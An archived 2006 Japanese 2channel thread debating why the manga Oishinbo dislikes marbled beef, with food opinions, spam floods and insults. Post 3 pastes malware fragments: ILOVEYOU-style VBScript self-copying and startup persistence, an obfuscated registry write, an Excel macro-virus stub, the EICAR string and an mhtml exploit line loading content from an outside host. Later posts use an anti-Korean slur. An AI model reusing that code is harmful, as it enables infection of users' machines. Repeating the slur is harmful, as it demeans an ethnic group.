2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

美味しんぼはなぜ霜降り肉を嫌うのか?part2

1 :食いだおれさん:2006/09/13(水) 00:04:26
前スレッド
美味しんぼはなぜ霜降り肉を嫌うのか?
http://food6.2ch.net/test/read.cgi/gurume/1061911757/

前スレッドは人工霜降り肉の話題が佳境に達したところで終わってしまいました。
食通で知られる雁屋氏ですが、最近、彼の見識に批判や疑問の声が挙がっているようです。
雁屋氏支持者の方も批判者の方も引き続き議論しましょう。

2 :2:2006/09/13(水) 00:10:43
( ´_ゝ`)2get

3 :食いだおれさん:2006/09/13(水) 07:35:10
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

4 :食いだおれさん:2006/09/13(水) 11:23:23
昨晩はサラミソーセージをおつまみにビールで晩酌したのだが、薄切りサラミを見て思った。
大量の脂身と赤身がモザイク状に混じっている。粒度に違いはあるが、霜降り状だ。
サラミの薄切りを口に入れると、舌先で脂肪がとろける感触。噛むと口の中に肉の味が広がる。これが旨い。
霜降りの旨さもこれに近い。ただし、霜降りの場合、柔らかいからほとんど噛まなくても肉の味がする。
どちらも一度にたくさん食べるものではない(食べられない)という点でも両者は似ている。

5 :食いだおれさん:2006/09/14(木) 20:54:53
ほんとに上等の霜降って旨いね。

6 :食いだおれさん:2006/09/14(木) 23:43:36
大田原牛最強!!人生狂わす!!

7 :食いだおれさん:2006/09/15(金) 00:19:32
しゅうちゃん!!
もwwwwww
   好きなんだから!!

8 :食いだおれさん:2006/09/23(土) 19:36:33
笑っていいともに木村カエラがゲストに来た時、肉の話題で盛り上がってたけど
なんか最近、わけわっからんタレントがサシが入ったとされる脂肪だらけの肉食って
『柔らかくてオイシーイ!サイコウッ!』って言ってんのが我慢ならない。
あれアブラじゃん。オレは肉食いたいんだよ。と、タモリ氏。
カエラも同意見。
違う番組で、ハンマー投げの室伏君。『サシの入った肉ニガテです。赤身じゃないと。』
けっこう白っぽくみえるようなサシを嫌う人が多くてよかった。
このごろどのテレビ番組見ても、脂たっぷりのものほど褒めちぎる傾向にあるので肩身が狭い思いだった。
タモリたちの考えでたすかったさ。


9 :食いだおれさん:2006/09/23(土) 19:37:48
お前はカエルが氏ねと言えば氏ぬのか? ゲロゲロ。

10 :食いだおれさん:2006/09/23(土) 19:45:43
>>9
意味不明。
オレと同じ考えをもってると思っただけよ。
なにか?
それともオメ死んだらどう。

11 :食いだおれさん:2006/09/23(土) 20:46:23
まあ、肉好きな人はあんな気持ち悪い脂だらけの食い物は食わないよな。
でも、当たり前のことを言っても、脂好きには何いってもムリ。

12 :食いだおれさん:2006/09/23(土) 21:57:57
お前もたいしたことないやつだな。考えじゃないよ、お前脳ないもん。

13 :食いだおれさん:2006/09/25(月) 18:03:27
たしかに。
たんに脂好きってことだな。
マグロの大トロなんて気持ち悪くてさ。あんなのが高価な値段で流通しているアホらしさ。
燃料の代りにするなら希少価値で高くなるのも分かる。

14 :食いだおれさん:2006/09/26(火) 00:52:23
おいおい今日山岡さん霜降り肉を究極のメニューに出したぞ。

15 : ◆cZ.fZ40Cf2 :2006/09/26(火) 01:48:01
まだ週1連載してるのか

16 :食いだおれさん:2006/10/02(月) 11:16:49
よく若いバカタレント達が、『やわらかくてオイシィー』ってグルメレポートしてるが
なんなんだあれ。やわらかければ美味いのか。でえっきらいだ。気持ちワル。
ちゃんとしっかりした食感のものを食え!

17 :食いだおれさん:2006/10/02(月) 12:21:34
あと、さっぱりしてておいしい、とか言うバカな。
水でも飲んでろ。

18 :食いだおれさん:2006/10/02(月) 14:46:34
脂がいやなら揚げ物も炒め物もやめろ。
脂はうまいんだよ、ただ量の問題だ。
「うまいんだけど、身体が受け付けなくて量は食えない」ならわかる。
オレもそうだ。
ちょっぴりの霜降り食いながら野菜いっぱい食え。
頭から全否定したらチーズも食えねーし、牛乳も飲めねー。

19 :食いだおれさん:2006/10/02(月) 19:33:25
そういうことじゃないんだよな。極端だの。カリカリしなさんな。
脂すべてを否定してるんじゃないんだよ。
ただな、いまさ、世の中あまりにも『柔らかい』『ジューシー』じゃん。
本来のシルキーさってのは本当に美味いものなら少々硬くてもあるしさ。
もちろん、脂たっぷりじゃなくても本当に美味しいものは美味しいんだよ。
それをさ、脂っ濃いとジューシーって言うし、なんか違うだろ。
脂っ濃さを競い合ってる感ありな気がすることが我慢ならんのさ。

20 :食いだおれさん:2006/10/02(月) 19:41:32
少なくとも霜降りってのは不自然な肉であることは確かだよ。
フォアグラみたいに不自然でも美味いものは美味いけど。
霜降りも悪かぁないんだよね。どんな料理にもってわけには
いかないだけだね。

21 :食いだおれさん:2006/10/03(火) 08:48:59
んーでも霜降りの良いお肉、肉刺しにして食べるとウマいよ。
醤油に鶉の卵落として、生のオニオンスライスを挟んで食べるとウマウマ。

22 :食いだおれさん:2006/10/03(火) 13:52:22
牛刺は赤身だろう。
これだけは美味しんぼを支持だ。

23 :食いだおれさん:2006/10/03(火) 14:03:18
牛鍋をやろうってなら霜降りがいいね。すき焼きじないよ。
肉が角切りでタレは味噌。油が溶け出した味噌が野菜に染みてうまい。
余分な油が溶け出したあとにゼラチンが残るので肉もうまい。

24 :食いだおれさん:2006/10/03(火) 14:18:33
:食いだおれさん :2006/10/03(火) 14:08:37
大田原旨いものを「ぅんまぃ」と言って何が悪い ! !

ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。

ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。

ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。

ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。

ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。

ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ

25 :食いだおれさん:2006/10/03(火) 15:50:39
霜降り肉ってやっぱり美味いよな。

26 :食いだおれさん:2006/10/03(火) 16:04:52
不味い

27 :食いだおれさん:2006/10/04(水) 01:46:07
別に脂っこいのは嫌いじやないが、
*ーメン*郎は勘弁してくれ。
つーか、***店の不衛生さはありえない。
食ったあと、腹痛くなったが、
間違いなく切って常温放置してるキャベツが
原因だと思ってる。

28 :食いだおれさん:2006/10/04(水) 01:53:37
霜降り肉はうまいが二郎はまずい

29 :食いだおれさん:2006/10/04(水) 03:42:40
>>22
同感。生の脂は少ないほうがいい。あっても細かくないと舌に残る。
霜降りで脂が半分ぐらいあるやつは熱通さなきゃ絶対ダメ。

>>24
ラードなめながら普通の肉食えば同じ味

30 :食いだおれさん:2006/10/04(水) 09:40:08
結局、人肌で溶ける霜降り肉を食べたこと無いだけだな。
>>29いくら何でも脂肪が半分もある霜降りを刺身では食わないよ。

31 :食いだおれさん:2006/10/04(水) 10:52:14
人肌で溶け「始める」だけでとろっと全部解けちゃうってことはない。
牛だって生きてる間は体温があったわけだから、脂肪がみんな液体では
何かと不都合でしょ。
生食べるなら良く歩いて締まった肉を脂身を徹底的に掃除して薄切りに
したものがいい。脂肪の旨みが好きなら常温で液体の脂を使ったタレで
マリネするとかした方が美味い。

32 :食いだおれさん:2006/10/04(水) 10:53:03
いや、常温で液体なら「油」だな。


33 :食いだおれさん:2006/10/04(水) 12:34:09
そういうこと。

34 :食いだおれさん:2006/10/04(水) 12:56:12
牛の体温約38.3〜38.8℃

35 :食いだおれさん:2006/10/04(水) 13:36:35
上等な霜降りを食べると「う゛〜わ!」って
彦摩呂みたいなリアクションをする俺は霜降りマンセー。

ただ、アメリカで食べたほぼ赤身だけの肉はパサつきもせず、すごく美味かったなぁ。



>>31
>脂肪の旨みが好きなら常温で液体の脂を使ったタレで
マリネするとかした方が美味い。

美味そうですね。

36 :食いだおれさん:2006/10/04(水) 18:10:01
不味い


37 :食いだおれさん:2006/10/05(木) 01:54:50
霜降りのあぶらもラードも同じ。


38 :食いだおれさん:2006/10/05(木) 09:52:25
そもそも美味しんぼなんか、
作者の味の好みのごり押し独善自己満足オナニーマンガにすぎない。

39 :食いだおれさん:2006/10/05(木) 10:00:44
そうなのよぉ〜 ワラワラ

40 :食いだおれさん:2006/10/05(木) 14:48:24
大田原

ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。

ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。

ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。

ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。

ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。

ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ


41 :食いだおれさん:2006/10/07(土) 11:06:01
>>18
このひとはバランスのない人だと思う。

42 :食いだおれさん:2006/10/07(土) 12:50:57
シモフリでない肉はステーキにするときに技がいるのは確かだと思う。

43 :食いだおれさん:2006/10/07(土) 13:11:39
魚焼く時はきちんと余分な脂が落ちるように焼くのに
肉焼く時は脂のった肉にさらに油加えてフライパンでソテーするから
確かにいい肉を台無しにしてることはある気がするなあ・・・
あの焼き方は赤身の肉を食べる人たちのやり方だと思うんだよな。

霜降りの肉を石焼に山葵醤油で食べるとか、
その程度の工夫で全然問題なくなると思うが。

44 :食いだおれさん:2006/10/07(土) 13:12:26
じゃ、自演ってことで

45 :食いだおれさん:2006/10/08(日) 00:38:35
大田原

ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。

ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。

ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。

ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。

ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。

ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ。ぅんまぃ

もんくあるか 栃木最高

46 :食いだおれさん:2006/10/08(日) 04:44:46
星ありす

47 :食いだおれさん:2006/10/08(日) 15:02:54
単に2chしか楽しみがない荒らし
ってなわけで
いつものやつたのむよ

48 :食いだおれさん:2006/10/08(日) 15:19:36
>>47そんな自己紹介しなくても知ってるよw

49 :食いだおれさん:2006/10/08(日) 22:00:53
それでは
じゃ、自演ってことで

50 ::2006/10/08(日) 22:05:54
頭が悪いってことで

51 :食いだおれさん:2006/10/08(日) 23:27:36
>>50
( ^^)

52 :食いだおれさん:2006/10/08(日) 23:28:22
(・∀・)パンツははくんじゃない
食べろ

53 :食いだおれさん:2006/10/08(日) 23:28:27
>>47
アフォか

54 :食いだおれさん:2006/10/08(日) 23:28:30
>>47
へえ

55 :食いだおれさん:2006/10/08(日) 23:28:38
>>>47
ヮィヮ ヵッォゃ

56 :食いだおれさん:2006/10/08(日) 23:28:47
>>47
( ^^)

57 :食いだおれさん:2006/10/08(日) 23:29:00
>>47
(・∀・)パンツははくんじゃない
食べろ

58 :食いだおれさん:2006/10/08(日) 23:29:13
>>47
はぁ?
一生頼まれてろぼけ

59 :食いだおれさん:2006/10/08(日) 23:29:20
>>47
ヮィヮ ***ゃ

60 :食いだおれさん:2006/10/08(日) 23:31:05
>>47
ヮィヮ ヵッォゃ

61 :食いだおれさん:2006/11/11(土) 23:27:40
栃木県民性
思い込みが激しい
執念深い
自意識過剰


62 :食いだおれさん:2006/12/13(水) 15:13:08
>>1 削除依頼だせよ

63 :食いだおれさん:2006/12/15(金) 17:46:23
おいしんぼの作者ってチョンでしょ?電通出身だし、韓国料理やキムチ絶賛するし。


64 :食いだおれさん:2006/12/18(月) 13:00:53
チョソよりたちが悪いかも。

65 :食いだおれさん:2007/02/15(木) 14:31:16
>>1削除依頼出せ

14 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)